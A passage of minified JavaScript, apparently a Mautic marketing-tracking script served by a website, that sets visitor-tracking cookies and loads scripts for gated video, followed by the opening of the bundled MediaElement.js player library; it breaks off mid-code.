XDomainRequest();xhr.open(method,url);} return xhr;};MauticJS.CORSRequestsAllowed=true;MauticJS.makeCORSRequest=function(method,url,data,callbackSuccess,callbackError){data=MauticJS.appendTrackedContact(data);var query=MauticJS.serialize(data);if(method.toUpperCase()==='GET'){url=url+'?'+query;var query='';} var xhr=MauticJS.createCORSRequest(method,url);var response;callbackSuccess=callbackSuccess||function(response,xhr){};callbackError=callbackError||function(response,xhr){};if(!xhr){MauticJS.log('MauticJS.debug: Could not create an XMLHttpRequest instance.');return false;} if(!MauticJS.CORSRequestsAllowed){callbackError({},xhr);return false;} xhr.onreadystatechange=function(e){if(xhr.readyState===XMLHttpRequest.DONE){response=MauticJS.parseTextToJSON(xhr.responseText);if(xhr.status===200){callbackSuccess(response,xhr);}else{callbackError(response,xhr);if(xhr.status===XMLHttpRequest.UNSENT){MauticJS.CORSRequestsAllowed=false;}}}};if(typeof xhr.setRequestHeader!=="undefined"){if(method.toUpperCase()==='POST'){xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');} xhr.setRequestHeader('X-Requested-With','XMLHttpRequest');xhr.withCredentials=true;} xhr.send(query);};MauticJS.parseTextToJSON=function(maybeJSON){var response;try{response=JSON.parse(maybeJSON);}catch(error){response=maybeJSON;} return response;};MauticJS.insertScript=function(scriptUrl){var scriptsInHead=document.getElementsByTagName('head')[0].getElementsByTagName('script');var lastScript=scriptsInHead[scriptsInHead.length-1];var scriptTag=document.createElement('script');scriptTag.async=1;scriptTag.src=scriptUrl;if(lastScript){lastScript.parentNode.insertBefore(scriptTag,lastScript);}else{document.getElementsByTagName('head')[0].appendChild(scriptTag);}};MauticJS.insertStyle=function(styleUrl){var linksInHead=document.getElementsByTagName('head')[0].getElementsByTagName('link');var lastLink=linksInHead[linksInHead.length-1];var linkTag=document.createElement('link');linkTag.rel="stylesheet";linkTag.type="text/css";linkTag.href=styleUrl;if(lastLink){lastLink.parentNode.insertBefore(linkTag,lastLink.nextSibling);}else{document.getElementsByTagName('head')[0].appendChild(linkTag);}};MauticJS.guid=function(){function s4(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);} return s4()+s4()+'-'+s4()+'-'+s4()+'-'+s4()+'-'+s4()+s4()+s4();};MauticJS.dispatchEvent=function(name,detail){var event=new CustomEvent(name,{detail:detail});document.dispatchEvent(event);};function s4(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);} MauticJS.mtcSet=false;MauticJS.appendTrackedContact=function(data){if(window.localStorage){if(mtcId=localStorage.getItem('mtc_id')){data['mautic_device_id']=localStorage.getItem('mautic_device_id');}} return data;};MauticJS.getTrackedContact=function(){if(MauticJS.mtcSet){return;} MauticJS.makeCORSRequest('GET',MauticJS.contactIdUrl,{},function(response,xhr){MauticJS.setTrackedContact(response);});};MauticJS.setTrackedContact=function(response){if(response.id){MauticJS.setCookie('mtc_id',response.id);MauticJS.setCookie('mtc_sid',response.sid);MauticJS.setCookie('mautic_device_id',response.device_id);MauticJS.mtcSet=true;try{localStorage.setItem('mtc_id',response.id);localStorage.setItem('mtc_sid',response.sid);localStorage.setItem('mautic_device_id',response.device_id);}catch(e){console.warn('Browser does not allow storing in local storage');}}};MauticJS.postEventDeliveryQueue=[];MauticJS.firstDeliveryMade=false;MauticJS.onFirstEventDelivery=function(f){MauticJS.postEventDeliveryQueue.push(f);};MauticJS.preEventDeliveryQueue=[];MauticJS.beforeFirstDeliveryMade=false;MauticJS.beforeFirstEventDelivery=function(f){MauticJS.preEventDeliveryQueue.push(f);};document.addEventListener('mauticPageEventDelivered',function(e){var detail=e.detail;var isImage=detail.image;if(isImage&&!MauticJS.mtcSet){MauticJS.getTrackedContact();}else if(detail.response&&detail.response.id){MauticJS.setTrackedContact(detail.response);} if(!isImage&&typeof detail.event[3]==='object'&&typeof detail.event[3].onload==='function'){detail.event[3].onload(detail)} if(!MauticJS.firstDeliveryMade){MauticJS.firstDeliveryMade=true;for(var i=0;i<MauticJS.postEventDeliveryQueue.length;i++){if(typeof MauticJS.postEventDeliveryQueue[i]==='function'){MauticJS.postEventDeliveryQueue[i](detail);} delete MauticJS.postEventDeliveryQueue[i];}}});MauticJS.pixelLoaded=function(f){MauticJS.onFirstEventDelivery(f);} MauticJS.checkForTrackingPixel=function(){if(!/in/.test(document.readyState)){setTimeout(function(){MauticJS.checkForTrackingPixel()},9)}else{var maxChecks=3000;var checkPixel=setInterval(function(){if(maxChecks>0&&!MauticJS.isPixelLoaded(true)){maxChecks--;return;} clearInterval(checkPixel);if(maxChecks>0){var params={},hash;var hashes=MauticJS.trackingPixel.src.slice(MauticJS.trackingPixel.src.indexOf('?')+1).split('&');for(var i=0;i<hashes.length;i++){hash=hashes[i].split('=');params[hash[0]]=hash[1];} MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':['send','pageview',params],'params':params,'image':true});}},1);}} MauticJS.checkForTrackingPixel();MauticJS.isPixelLoaded=function(domOnly){if(typeof domOnly=='undefined'){domOnly=false;} if(typeof MauticJS.trackingPixel==='undefined'){MauticJS.trackingPixel=null;var imgs=Array.prototype.slice.apply(document.getElementsByTagName('img'));for(var i=0;i<imgs.length;i++){if(imgs[i].src.indexOf('mtracking.gif')!==-1){MauticJS.trackingPixel=imgs[i];break;}}}else if(domOnly){return false;} if(MauticJS.trackingPixel&&MauticJS.trackingPixel.complete&&MauticJS.trackingPixel.naturalWidth!==0){return true;} return false;};if(typeof window[window.MauticTrackingObject]!=='undefined'){MauticJS.input=window[window.MauticTrackingObject];if(typeof MauticJS.input.q==='undefined'){MauticJS.input.q=[];} MauticJS.inputQueue=MauticJS.input.q;if(!MauticJS.inputQueue.hasOwnProperty('push')){Object.defineProperty(MauticJS.inputQueue,'push',{configurable:false,enumerable:false,writable:false,value:function(){for(var i=0,n=this.length,l=arguments.length;i<l;i++,n++){MauticJS.dispatchEvent('eventAddedToMauticQueue',arguments[i]);} return n;}});} MauticJS.getInput=function(task,type){var matches=[];if(typeof MauticJS.inputQueue!=='undefined'&&MauticJS.inputQueue.length){for(var i in MauticJS.inputQueue){if(MauticJS.inputQueue[i][0]===task&&MauticJS.inputQueue[i][1]===type){matches.push(MauticJS.inputQueue[i]);}}} return matches;}}MauticJS.initGatedVideo=function(){MauticJS.videoElements=MauticJS.videoElements||document.getElementsByTagName('video');if(!MauticJS.videoElements.length){MauticJS.videoElements=null;return;} MauticJS.mauticInsertedScripts=MauticJS.mauticInsertedScripts||{};if("undefined"==typeof jQuery&&"undefined"==typeof MauticJS.mauticInsertedScripts.jQuery){MauticJS.insertScript('https://mautic2018.easyredmine.com/app/bundles/CoreBundle/Assets/js/libraries/2.jquery.js');MauticJS.mauticInsertedScripts.jQuery=true;} if("undefined"==typeof Froogaloop&&"undefined"==typeof MauticJS.mauticInsertedScripts.Froogaloop){MauticJS.insertScript('https://f.vimeocdn.com/js/froogaloop2.min.js');MauticJS.mauticInsertedScripts.Froogaloop=true;} if("undefined"==typeof jQuery||"undefined"==typeof Froogaloop){MauticJS.gatedVideoTimeoutID=window.setTimeout(MauticJS.initGatedVideo,1000);}else{MauticJS.insertStyle('https://mautic2018.easyredmine.com/media/css/mediaelementplayer.css'); /*! * * MediaElement.js * HTML5 <video> and <audio> shim and player * http://mediaelementjs.com/ * * Creates a JavaScript object that mimics HTML5 MediaElement API * for browsers that don't understand HTML5 or can't play the provided codec * Can play MP4 (H.264), Ogg, WebM, FLV, WMV, WMA, ACC, and MP3 * * Copyright 2010-2014, John Dyer (http://j.hn) * License: MIT * */ var mejs=mejs||{};mejs.version="2.21.2",mejs.meIndex=0,mejs.plugins={silverlight:[{version:[3,0],types:["video/mp4","video/m4v","video/mov","video/wmv","audio/wma","audio/m4a","audio/mp3","audio/wav","audio/mpeg"]}],flash:[{version:[9,0,124],types:["video/mp4","video/m4v","video/mov","video/flv","video/rtmp","video/x-flv","audio/flv","audio/x-flv","audio/mp3","audio/m4a","audio/mpeg","video/dailymotion","video/x-dailymotion","application/x-mpegURL"]}],youtube:[{version:null,types:["video/youtube","video/x-youtube","audio/youtube","audio/x-youtube"]}],vimeo:[{version:null,types:["video/vimeo","video/x-vimeo"]}]},mejs.Utility={encodeUrl:function(a){return encodeURIComponent(a)},escapeHTML:function(a){return a.toString().split("&").join("&amp;").split("<").join("&lt;").split('"').join("&quot;")},absolutizeUrl:function(a){var b=document.createElement("div");return b.innerHTML='<a href="'+this.escapeHTML(a)+'">x</a>',b.firstChild.href},getScriptPath:function(a){for(var b,c,d,e,f,g,h=0,i="",j="",k=document.getElementsByTagName("script"),l=k.length,m=a.length;l>h;h++){for(e=k[h].src,c=e.lastIndexOf("/"),c>-1?(g=e.substring(c+1),f=e.substring(0,c+1)):(g=e,f=""),b=0;m>b;b++)if(j=a[b],d=g.indexOf(j),d>-1){i=f;break}if(""!==i)break}return i},calculateTimeFormat:function(a,b,c){0>a&&(a=0),"undefined"==typeof c&&(c=25);var d=b.timeFormat,e=d[0],f=d[1]==d[0],g=f?2:1,h=":",i=Math.floor(a/3600)%24,j=Math.floor(a/60)%60,k=Math.floor(a%60),l=Math.floor((a%1*c).toFixed(3)),m=[[l,"f"],[k,"s"],[j,"m"],[i,"h"]];d.length<g&&(h=d[g]);for(var n=!1,o=0,p=m.length;p>o;o++)if(-1!==d.indexOf(m[o][1]))n=!0;else if(n){for(var q=!1,r=o;p>r;r++)if(m[r][0]>0){q=!0;break}if(!q)break;f||(d=e+d),d=m[o][1]+h+d,f&&(d=m[o][1]+d),e=m[o][1]}b.currentTimeFormat=d},twoDigitsString:function(a){return 10>a?"0"+a:String(a)},secondsToTimeCode:function(a,b){if(0>a&&(a=0),"object"!=typeof b){var c="m:ss";c=arguments[1]?"hh:mm:ss":c,c=arguments[2]?c+":ff":c,b={currentTimeFormat:c,framesPerSecond:arguments[3]||25}}var d=b.framesPerSecond;"undefined"==typeof d&&(d=25);var c=b.currentTimeFormat,e=Math.floor(a/3600)%24,f=Math.floor(a/60)%60,g=Math.floor(a%60),h=Math.floor((a%1*d).toFixed(3));lis=[[h,"f"],[g,"s"],[f,"m"],[e,"h"]];var j=c;for(i=0,len=lis.length;i<len;i++)j=j.replace(lis[i][1]+lis[i][1],this.twoDigitsString(lis[i][0])),j=j.replace(lis[i][1],lis[i][0]);return j},timeCodeToSeconds:function(a,b,c,d){"undefined"==typeof c?c=!1:"undefined"==typeof d&&(d=25);var e=a.split(":"),f=parseInt(e[0],10),g=parseInt(e[1],10),h=parseInt(e[2],10),i=0,j=0;return c&&(i=parseInt(e[3])/d),j=3600*f+60*g+h+i},convertSMPTEtoSeconds:function(a){if("string"!=typeof a)return!1;a=a.replace(",",".");var b=0,c=-1!=a.indexOf(".")?a.split(".")[1].length:0,d=1;a=a.split(":").reverse();for(var e=0;e<a.length;e++)d=1,e>0&&(d=Math.pow(60,e)),b+=Number(a[e])*d;return Number(b.toFixed(c))},removeSwf:function(a){var b=document.getElementById(a);b&&/object|embed/i.test(b.nodeName)&&(mejs.MediaFeatures.isIE?(b.style.display="none",function(){4==b.readyState?mejs.Utility.removeObjectInIE(a):setTimeout(arguments.callee,10)}()):b.parentNode.removeChild(b))},removeObjectInIE:function(a){var b=document.getElementById(a);if(b){for(var c in b)"function"==typeof b[c]&&(b[c]=null);b.parentNode.removeChild(b)}},determineScheme:function(a){return a&&-1!=a.indexOf("://")?a.substr(0,a.indexOf("://")+3):"//"}},mejs.PluginDetector={hasPluginVersion:function(a,b){var c=this.plugins[a];return b[1]=b[1]||0,b[2]=b[2]||0,c[0]>b[0]||c[0]==b[0]&&c[1]>b[1]||c[0]==b[0]&&c[1]==b[1]&&c[2]>=b[2]?!0:!1},nav:window.navigator,ua:window.navigator.userAgent.toLowerCase(),plugins:[],addPlugin:function(a,b,c,d,e){this.plugins[a]=this.detectPlugin(b,c,d,e)},detectPlugin:function(a,b,c,d){var e,f,g,h=[0,0,0];if("undefined"!=typeof this.nav.plugins&&"object"==typeof this.nav.plugins[a]){if(e=this.nav.plugins[a].description,e&&("undefined"==typeof this.nav.mimeTypes||!this.nav.mimeTypes[b]||this.nav.mimeTypes[b].enabledPlugin))for(h=e.replace(a,"").replace(/^\s+/,"").replace(/\sr/gi,".").split("."),f=0;f<h.length;f++)h[f]=parseInt(h[f].match(/\d+/),10)}else if("undefined"!=typeof window.ActiveXObject)try{g=new ActiveXObject(c),g&&(h=d(g))}catch(i){}return h}},mejs.PluginDetector.addPlugin("flash","Shockwave Flash","application/x-shockwave-flash","ShockwaveFlash.ShockwaveFlash",function(a){var b=[],c=a.GetVariable("$version");return c&&(c=c.split(" ")[1].split(","),b=[parseInt(c[0],10),parseInt(c[1],10),parseInt(c[2],10)]),b}),mejs.PluginDetector.addPlugin("silverlight","Silverlight Plug-In","application/x-silverlight-2","AgControl.AgControl",function(a){var b=[0,0,0,0],c=function(a,b,c,d){for(;a.isVersionSupported(b[0]+"."+b[1]+"."+b[2]+"."+b[3]);)b[c]+=d;b[c]-=d};return c(a,b,0,1),c(a,b,1,1),c(a,b,2,1e4),c(a,b,2,1e3),c(a,b,2,100),c(a,b,2,10),c(a,b,2,1),c(a,b,3,1),b}),mejs.MediaFeatures={init:function(){var a,b,c=this,d=document,e=mejs.PluginDetector.nav,f=mejs.PluginDetector.ua.toLowerCase(),g=["source","track","audio","video"];c.isiPad=null!==f.match(/ipad/i),c.isiPhone=null!==f.match(/iphone/i),c.isiOS=c.isiPhone||c.isiPad,c.isAndroid=null!==f.match(/android/i),c.isBustedAndroid=null!==f.match(/android 2\.[12]/),c.isBustedNativeHTTPS="https:"===location.protocol&&(null!==f.match(/android [12]\./)||null!==f.match(/macintosh.* version.* safari/)),c.isIE=-1!=e.appName.toLowerCase().indexOf("microsoft")||null!==e.appName.toLowerCase().match(/trident/gi),c.isChrome=null!==f.match(/chrome/gi),c.isChromium=null!==f.match(/chromium/gi),c.isFirefox=null!==f.match(/firefox/gi),c.isWebkit=null!==f.match(/webkit/gi),c.isGecko=null!==f.match(/gecko/gi)&&!c.isWebkit&&!c.isIE,c.isOpera=null!==f.match(/opera/gi),c.hasTouch="ontouchstart"in window,c.svgAsImg=!!document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1");for(a=0;a<g.length;a++)b=document.createElement(g[a]);c.supportsMediaTag="undefined"!=typeof b.canPlayType||c.isBustedAndroid;try{b.canPlayType("video/mp4")}catch(h){c.supportsMediaTag=!1}c.supportsPointerEvents=function(){var a,b=document.createElement("x"),c=document.documentElement,d=window.getComputedStyle;return"pointerEvents"in b.style?(b.style.pointerEvents="auto",b.style.pointerEvents="x",c.appendChild(b),a=d&&"auto"===d(b,"").pointerEvents,c.removeChild(b),!!a):!1}(),c.hasFirefoxPluginMovingProblem=!1,c.hasiOSFullScreen="undefined"!=typeof b.webkitEnterFullscreen,c.hasNativeFullscreen="undefined"!=typeof b.requestFullscreen,c.hasWebkitNativeFullScreen="undefined"!=typeof b.webkitRequestFullScreen,c.hasMozNativeFullScreen="undefined"!=typeof b.mozRequestFullScreen,c.hasMsNativeFullScreen="undefined"!=typeof b.msRequestFullscreen,c.hasTrueNativeFullScreen=c.hasWebkitNativeFullScreen||c.hasMozNativeFullScreen||c.hasMsNativeFullScreen,c.nativeFullScreenEnabled=c.hasTrueNativeFullScreen,c.hasMozNativeFullScreen?c.nativeFullScreenEnabled=document.mozFullScreenEnabled:c.hasMsNativeFullScreen&&(c.nativeFullScreenEnabled=document.msFullscreenEnabled),c.isChrome&&(c.hasiOSFullScreen=!1),c.hasTrueNativeFullScreen&&(c.fullScreenEventName="",c.hasWebkitNativeFullScreen?c.fullScreenEventName="webkitfullscreenchange":c.hasMozNativeFullScreen?c.fullScreenEventName="mozfullscreenchange":c.hasMsNativeFullScreen&&(c.fullScreenEventName="MSFullscreenChange"),c.isFullScreen=function(){return c.hasMozNativeFullScreen?d.mozFullScreen:c.hasWebkitNativeFullScreen?d.webkitIsFullScreen:c.hasMsNativeFullScreen?null!==d.msFullscreenElement:void 0},c.requestFullScreen=function(a){c.hasWebkitNativeFullScreen?a.webkitRequestFullScreen():c.hasMozNativeFullScreen?a.mozRequestFullScreen():c.hasMsNativeFullScreen&&a.msRequestFullscreen()},c.cancelFullScreen=function(){c.hasWebkitNativeFullScreen?document.webkitCancelFullScreen():c.hasMozNativeFullScreen?document.mozCancelFullScreen():c.hasMsNativeFullScreen&&document.msExitFullscreen()}),c.hasiOSFullScreen&&f.match(/mac os x 10_5/i)&&(c.hasNativeFullScreen=!1,c.hasiOSFullScreen=!1)}},mejs.MediaFeatures.init(),mejs.HtmlMediaElement={pluginType:"native",isFullScreen:!1,setCurrentTime:function(a){this.currentTime=a},setMuted:function(a){this.muted=a},setVolume:function(a){this.volume=a},stop:function(){this.pause()},setSrc:function(a){for(var b=this.getElementsByTagName("source");b.length>0;)this.removeChild(b[0]);if("string"==typeof a)this.src=a;else{var c,d;for(c=0;c<a.length;c++)if(d=a[c],this.canPlayType(d.type)){this.src=d.src;break}}},setVideoSize:function(a,b){this.width=a,this.height=b}},mejs.PluginMediaElement=function(a,b,c){this.id=a,this.pluginType=b,this.src=c,this.events={},this.attributes={}},mejs.PluginMediaElement.prototype={pluginElement:null,pluginType:"",isFullScreen:!1,playbackRate:-1,defaultPlaybackRate:-1,seekable:[],played:[],paused:!0,ended:!1,seeking:!1,duration:0,error:null,tagName:"",muted:!1,volume:1,currentTime:0,play:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.playVideo():this.pluginApi.playMedia(),this.paused=!1)},load:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType||this.pluginApi.loadMedia(),this.paused=!1)},pause:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.pauseVideo():this.pluginApi.pauseMedia(),this.paused=!0)},stop:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.stopVideo():this.pluginApi.stopMedia(),this.paused=!0)},canPlayType:function(a){var b,c,d,e=mejs.plugins[this.pluginType];for(b=0;b<e.length;b++)if(d=e[b],mejs.PluginDetector.hasPluginVersion(this.pluginType,d.version))for(c=0;c<d.types.length;c++)if(a==d.types[c])return"probably";return""},positionFullscreenButton:function(a,b,c){null!=this.pluginApi&&this.pluginApi.positionFullscreenButton&&this.pluginApi.positionFullscreenButton(Math.floor(a),Math.floor(b),c)},hideFullscreenButton:function(){null!=this.pluginApi&&this.pluginApi.hideFullscreenButton&&this.pluginApi.hideFullscreenButton()},setSrc:function(a){if("string"==typeof a)this.pluginApi.setSrc(mejs.Utility.absolutizeUrl(a)),this.src=mejs.Utility.absolutizeUrl(a);else{var b,c;for(b=0;b<a.length;b++)if(c=a[b],this.canPlayType(c.type)){this.pluginApi.setSrc(mejs.Utility.absolutizeUrl(c.src)),this.src=mejs.Utility.absolutizeUrl(c.src);break}}},setCurrentTime:function(a){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.seekTo(a):this.pluginApi.setCurrentTime(a),this.currentTime=a)},setVolume:function(a){null!=this.pluginApi&&("youtube"==this.pluginType?this.pluginApi.setVolume(100*a):this.pluginApi.setVolume(a),this.volume=a)},setMuted:function(a){null!=this.pluginApi&&("youtube"==this.pluginType?(a?this.pluginApi.mute():this.pluginApi.unMute(),this.muted=a,this.dispatchEvent({type:"volumechange"})):this.pluginApi.setMuted(a),this.muted=a)},setVideoSize:function(a,b){this.pluginElement&&this.pluginElement.style&&(this.pluginElement.style.width=a+"px",this.pluginElement.style.height=b+"px"),null!=this.pluginApi&&this.pluginApi.setVideoSize&&this.pluginApi.setVideoSize(a,b)},setFullscreen:function(a){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.pluginApi.setFullscreen(a)},enterFullScreen:function(){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.setFullscreen(!0)},exitFullScreen:function(){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.setFullscreen(!1)},addEventListener:function(a,b,c){this.events[a]=this.events[a]||[],this.events[a].push(b)},removeEventListener:function(a,b){if(!a)return this.events={},!0;var c=this.events[a];if(!c)return!0;if(!b)return this.events[a]=[],!0;for(var d=0;d<c.length;d++)if(c[d]===b)return this.events[a].splice(d,1),!0;return!1},dispatchEvent:function(a){var b,c=this.events[a.type];if(c)for(b=0;b<c.length;b++)c[b].apply(this,[a])},hasAttribute:function(a){return a in this.attributes},removeAttribute:function(a){delete this.attributes[a]},getAttribute:function(a){return this.hasAttribute(a)?this.attributes[a]:""},setAttribute:function(a,b){this.attributes[a]=b},remove:function(){mejs.Utility.removeSwf(this.pluginElement.id),mejs.MediaPluginBridge.unregisterPluginElement(this.pluginElement.id)}},mejs.MediaElementDefaults={mode:"auto",plugins:["flash","silverlight","youtube","vimeo"],enablePluginDebug:!1,httpsBasicAuthSite:!1,type:"",pluginPath:mejs.Utility.getScriptPath(["mediaelement.js","mediaelement.min.js","mediaelement-and-player.js","mediaelement-and-player.min.js"]),flashName:"flashmediaelement.swf",flashStreamer:"",flashScriptAccess:"sameDomain",enablePluginSmoothing:!1,enablePseudoStreaming:!1,pseudoStreamingStartQueryParam:"start",silverlightName:"silverlightmediaelement.xap",defaultVideoWidth:480,defaultVideoHeight:270,pluginWidth:-1,pluginHeight:-1,pluginVars:[],timerRate:250,startVolume:.8,success:function(){},error:function(){}},mejs.MediaElement=function(a,b){return mejs.HtmlMediaElementShim.create(a,b)},mejs.HtmlMediaElementShim={create:function(a,b){var c,d,e={},f="string"==typeof a?document.getElementById(a):a,g=f.tagName.toLowerCase(),h="audio"===g||"video"===g,i=h?f.getAttribute("src"):f.getAttribute("href"),j=f.getAttribute("poster"),k=f.getAttribute("autoplay"),l=f.getAttribute("preload"),m=f.getAttribute("controls");for(d in mejs.MediaElementDefaults)e[d]=mejs.MediaElementDefaults[d];for(d in b)e[d]=b[d];return i="undefined"==typeof i||null===i||""==i?null:i,j="undefined"==typeof j||null===j?"":j,l="undefined"==typeof l||null===l||"false"===l?"none":l,k=!("undefined"==typeof k||null===k||"false"===k),m=!("undefined"==typeof m||null===m||"false"===m),c=this.determinePlayback(f,e,mejs.MediaFeatures.supportsMediaTag,h,i),c.url=null!==c.url?mejs.Utility.absolutizeUrl(c.url):"",c.scheme=mejs.Utility.determineScheme(c.url),"native"==c.method?(mejs.MediaFeatures.isBustedAndroid&&(f.src=c.url,f.addEventListener("click",function(){f.play()},!1)),this.updateNative(c,e,k,l)):""!==c.method?this.createPlugin(c,e,j,k,l,m):(this.createErrorMessage(c,e,j),this)},determinePlayback:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,n,o,p,q=[],r={method:"",url:"",htmlMediaElement:a,isVideo:"audio"!=a.tagName.toLowerCase(),scheme:""};if("undefined"!=typeof b.type&&""!==b.type)if("string"==typeof b.type)q.push({type:b.type,url:e});else for(f=0;f<b.type.length;f++)q.push({type:b.type[f],url:e});else if(null!==e)k=this.formatType(e,a.getAttribute("type")),q.push({type:k,url:e});else for(f=0;f<a.childNodes.length;f++)j=a.childNodes[f],1==j.nodeType&&"source"==j.tagName.toLowerCase()&&(e=j.getAttribute("src"),k=this.formatType(e,j.getAttribute("type")),p=j.getAttribute("media"),(!p||!window.matchMedia||window.matchMedia&&window.matchMedia(p).matches)&&q.push({type:k,url:e}));if(!d&&q.length>0&&null!==q[0].url&&this.getTypeFromFile(q[0].url).indexOf("audio")>-1&&(r.isVideo=!1),mejs.MediaFeatures.isBustedAndroid&&(a.canPlayType=function(a){return null!==a.match(/video\/(mp4|m4v)/gi)?"maybe":""}),mejs.MediaFeatures.isChromium&&(a.canPlayType=function(a){return null!==a.match(/video\/(webm|ogv|ogg)/gi)?"maybe":""}),c&&("auto"===b.mode||"auto_plugin"===b.mode||"native"===b.mode)&&(!mejs.MediaFeatures.isBustedNativeHTTPS||b.httpsBasicAuthSite!==!0)){for(d||(o=document.createElement(r.isVideo?"video":"audio"),a.parentNode.insertBefore(o,a),a.style.display="none",r.htmlMediaElement=a=o),f=0;f<q.length;f++)if("video/m3u8"==q[f].type||""!==a.canPlayType(q[f].type).replace(/no/,"")||""!==a.canPlayType(q[f].type.replace(/mp3/,"mpeg")).replace(/no/,"")||""!==a.canPlayType(q[f].type.replace(/m4a/,"mp4")).replace(/no/,"")){r.method="native",r.url=q[f].url;break}if("native"===r.method&&(null!==r.url&&(a.src=r.url),"auto_plugin"!==b.mode))return r}if("auto"===b.mode||"auto_plugin"===b.mode||"shim"===b.mode)for(f=0;f<q.length;f++)for(k=q[f].type,g=0;g<b.plugins.length;g++)for(l=b.plugins[g],m=mejs.plugins[l],h=0;h<m.length;h++)if(n=m[h],null==n.version||mejs.PluginDetector.hasPluginVersion(l,n.version))for(i=0;i<n.types.length;i++)if(k.toLowerCase()==n.types[i].toLowerCase())return r.method=l,r.url=q[f].url,r;return"auto_plugin"===b.mode&&"native"===r.method?r:(""===r.method&&q.length>0&&(r.url=q[0].url),r)},formatType:function(a,b){return a&&!b?this.getTypeFromFile(a):b&&~b.indexOf(";")?b.substr(0,b.indexOf(";")):b},getTypeFromFile:function(a){a=a.split("?")[0];var b=a.substring(a.lastIndexOf(".")+1).toLowerCase(),c=/(mp4|m4v|ogg|ogv|m3u8|webm|webmv|flv|wmv|mpeg|mov)/gi.test(b)?"video/":"audio/";return this.getTypeFromExtension(b,c)},getTypeFromExtension:function(a,b){switch(b=b||"",a){case"mp4":case"m4v":case"m4a":case"f4v":case"f4a":return b+"mp4";case"flv":return b+"x-flv";case"webm":case"webma":case"webmv":return b+"webm";case"ogg":case"oga":case"ogv":return b+"ogg";case"m3u8":return"application/x-mpegurl";case"ts":return b+"mp2t";default:return b+a}},createErrorMessage:function(a,b,c){var d=a.htmlMediaElement,e=document.createElement("div"),f=b.customError;e.className="me-cannotplay";try{e.style.width=d.width+"px",e.style.height=d.height+"px"}catch(g){}f||(f='<a href="'+a.url+'">',""!==c&&(f+='<img src="'+c+'" width="100%" height="100%" alt="" />'),f+="<span>"+mejs.i18n.t("Download File")+"</span></a>"),e.innerHTML=f,d.parentNode.insertBefore(e,d),d.style.display="none",b.error(d)},createPlugin:function(a,b,c,d,e,f){var g,h,i,j=a.htmlMediaElement,k=1,l=1,m="me_"+a.method+"_"+mejs.meIndex++,n=new mejs.PluginMediaElement(m,a.method,a.url),o=document.createElement("div");n.tagName=j.tagName;for(var p=0;p<j.attributes.length;p++){var q=j.attributes[p];q.specified&&n.setAttribute(q.name,q.value)}for(h=j.parentNode;null!==h&&null!=h.tagName&&"body"!==h.tagName.toLowerCase()&&null!=h.parentNode&&null!=h.parentNode.tagName&&null!=h.parentNode.constructor&&"ShadowRoot"===h.parentNode.constructor.name;){if("p"===h.parentNode.tagName.toLowerCase()){h.parentNode.parentNode.insertBefore(h,h.parentNode);break}h=h.parentNode}switch(a.isVideo?(k=b.pluginWidth>0?b.pluginWidth:b.videoWidth>0?b.videoWidth:null!==j.getAttribute("width")?j.getAttribute("width"):b.defaultVideoWidth,l=b.pluginHeight>0?b.pluginHeight:b.videoHeight>0?b.videoHeight:null!==j.getAttribute("height")?j.getAttribute("height"):b.defaultVideoHeight,k=mejs.Utility.encodeUrl(k),l=mejs.Utility.encodeUrl(l)):b.enablePluginDebug&&(k=320,l=240),n.success=b.success,o.className="me-plugin",o.id=m+"_container",a.isVideo?j.parentNode.insertBefore(o,j):document.body.insertBefore(o,document.body.childNodes[0]),("flash"===a.method||"silverlight"===a.method)&&(i=["id="+m,"isvideo="+(a.isVideo?"true":"false"),"autoplay="+(d?"true":"false"),"preload="+e,"width="+k,"startvolume="+b.startVolume,"timerrate="+b.timerRate,"flashstreamer="+b.flashStreamer,"height="+l,"pseudostreamstart="+b.pseudoStreamingStartQueryParam],null!==a.url&&("flash"==a.method?i.push("file="+mejs.Utility.encodeUrl(a.url)):i.push("file="+a.url)),b.enablePluginDebug&&i.push("debug=true"),b.enablePluginSmoothing&&i.push("smoothing=true"),b.enablePseudoStreaming&&i.push("pseudostreaming=true"),f&&i.push("controls=true"),b.pluginVars&&(i=i.concat(b.pluginVars)),window[m+"_init"]=function(){switch(n.pluginType){case"flash":n.pluginElement=n.pluginApi=document.getElementById(m);break;case"silverlight":n.pluginElement=document.getElementById(n.id),n.pluginApi=n.pluginElement.Content.MediaElementJS}null!=n.pluginApi&&n.success&&n.success(n,j)},window[m+"_event"]=function(a,b){var c,d,e;c={type:a,target:n};for(d in b)n[d]=b[d],c[d]=b[d];e=b.bufferedTime||0,c.target.buffered=c.buffered={start:function(a){return 0},end:function(a){return e},length:1},n.dispatchEvent(c)}),a.method){case"silverlight":o.innerHTML='<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" id="'+m+'" name="'+m+'" width="'+k+'" height="'+l+'" class="mejs-shim"><param name="initParams" value="'+i.join(",")+'" /><param name="windowless" value="true" /><param name="background" value="black" /><param name="minRuntimeVersion" value="3.0.0.0" /><param name="autoUpgrade" value="true" /><param name="source" value="'+b.pluginPath+b.silverlightName+'" /></object>';break;case"flash":mejs.MediaFeatures.isIE?(g=document.createElement("div"),o.appendChild(g),g.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="//download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="'+m+'" width="'+k+'" height="'+l+'" class="mejs-shim"><param name="movie" value="'+b.pluginPath+b.flashName+"?"+(new Date).getTime()+'" /><param name="flashvars" value="'+i.join("&amp;")+'" /><param name="quality" value="high" /><param name="bgcolor" value="#000000" /><param name="wmode" value="transparent" /><param name="allowScriptAccess" value="'+b.flashScriptAccess+'" /><param name="allowFullScreen" value="true" /><param name="scale" value="default" /></object>'):o.innerHTML='<embed 